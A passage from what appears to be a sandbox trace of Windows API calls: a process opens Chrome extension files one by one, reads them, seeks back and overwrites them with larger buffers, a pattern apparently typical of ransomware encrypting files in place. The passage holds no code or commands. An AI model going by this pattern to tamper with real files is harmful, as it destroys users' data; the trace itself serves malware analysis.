(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.369] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.369] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xac [0171.369] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.369] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.370] ReleaseMutex (hMutex=0x168) returned 1 [0171.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.370] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f35f58, nNumberOfBytesToRead=0xac, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35f58*, lpNumberOfBytesRead=0x2fdf2bc*=0xac, lpOverlapped=0x0) returned 1 [0171.371] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.371] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x634, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x634, lpOverlapped=0x0) returned 1 [0171.372] CloseHandle (hObject=0x1fc) returned 1 [0171.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.373] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.373] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x98 [0171.373] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.373] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.373] ReleaseMutex (hMutex=0x168) returned 1 [0171.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.374] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e94d68, nNumberOfBytesToRead=0x98, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e94d68*, lpNumberOfBytesRead=0x2fdf2bc*=0x98, lpOverlapped=0x0) returned 1 [0171.375] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.375] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x620, lpOverlapped=0x0) returned 1 [0171.375] CloseHandle (hObject=0x1fc) returned 1 [0171.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.376] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.377] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x13e [0171.377] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.377] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.377] ReleaseMutex (hMutex=0x168) returned 1 [0171.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.377] ReadFile (in: hFile=0x1fc, lpBuffer=0x2851278, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2851278*, lpNumberOfBytesRead=0x2fdf2bc*=0x13e, lpOverlapped=0x0) returned 1 [0171.378] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.378] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6c6, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6c6, lpOverlapped=0x0) returned 1 [0171.379] CloseHandle (hObject=0x1fc) returned 1 [0171.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0171.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xfb [0171.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.959] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.959] ReleaseMutex (hMutex=0x168) returned 1 [0171.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.959] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eea538, nNumberOfBytesToRead=0xfb, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x2fdf2bc*=0xfb, lpOverlapped=0x0) returned 1 [0171.961] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.961] WriteFile (in: hFile=0x1dc, lpBuffer=0x2873c08*, nNumberOfBytesToWrite=0x683, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2873c08*, lpNumberOfBytesWritten=0x2fdf2d0*=0x683, lpOverlapped=0x0) returned 1 [0174.170] CloseHandle (hObject=0x1dc) returned 1 [0174.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.171] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.171] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x183 [0174.172] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.172] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.172] ReleaseMutex (hMutex=0x168) returned 1 [0174.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.172] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x183, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x183, lpOverlapped=0x0) returned 1 [0174.174] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.174] WriteFile (in: hFile=0x1dc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x70b, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x70b, lpOverlapped=0x0) returned 1 [0174.174] CloseHandle (hObject=0x1dc) returned 1 [0174.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xbb [0174.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.180] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.181] ReleaseMutex (hMutex=0x168) returned 1 [0174.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.181] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ee0848, nNumberOfBytesToRead=0xbb, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0848*, lpNumberOfBytesRead=0x2fdf2bc*=0xbb, lpOverlapped=0x0) returned 1 [0174.182] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.182] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x643, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x643, lpOverlapped=0x0) returned 1 [0174.182] CloseHandle (hObject=0x1dc) returned 1 [0174.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb3 [0174.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.183] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.183] ReleaseMutex (hMutex=0x168) returned 1 [0174.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.183] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37a58, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37a58*, lpNumberOfBytesRead=0x2fdf2bc*=0xb3, lpOverlapped=0x0) returned 1 [0174.185] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.185] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x63b, lpOverlapped=0x0) returned 1 [0174.185] CloseHandle (hObject=0x1dc) returned 1 [0174.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xdd [0174.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.187] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.187] ReleaseMutex (hMutex=0x168) returned 1 [0174.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.187] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2fdf2bc*=0xdd, lpOverlapped=0x0) returned 1 [0174.188] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.189] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d1ab48*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab48*, lpNumberOfBytesWritten=0x2fdf2d0*=0x665, lpOverlapped=0x0) returned 1 [0174.189] CloseHandle (hObject=0x1dc) returned 1 [0174.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.190] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.190] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3b059 [0174.190] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.190] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.190] ReleaseMutex (hMutex=0x168) returned 1 [0174.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_window.js", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0174.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="craw_window.js", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="craw_window.js", lpUsedDefaultChar=0x0) returned 14 [0174.190] ReadFile (in: hFile=0x1dc, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0174.235] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3a059 [0174.235] ReadFile (in: hFile=0x1dc, lpBuffer=0x2885ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2885ae8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0174.237] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3a059 [0174.237] WriteFile (in: hFile=0x1dc, lpBuffer=0x284ca98*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x284ca98*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.237] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0174.237] WriteFile (in: hFile=0x1dc, lpBuffer=0x287dab8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x287dab8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0174.237] CloseHandle (hObject=0x1dc) returned 1 [0174.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.238] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.238] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa0 [0174.238] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.238] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.239] ReleaseMutex (hMutex=0x168) returned 1 [0174.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_hover.png", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 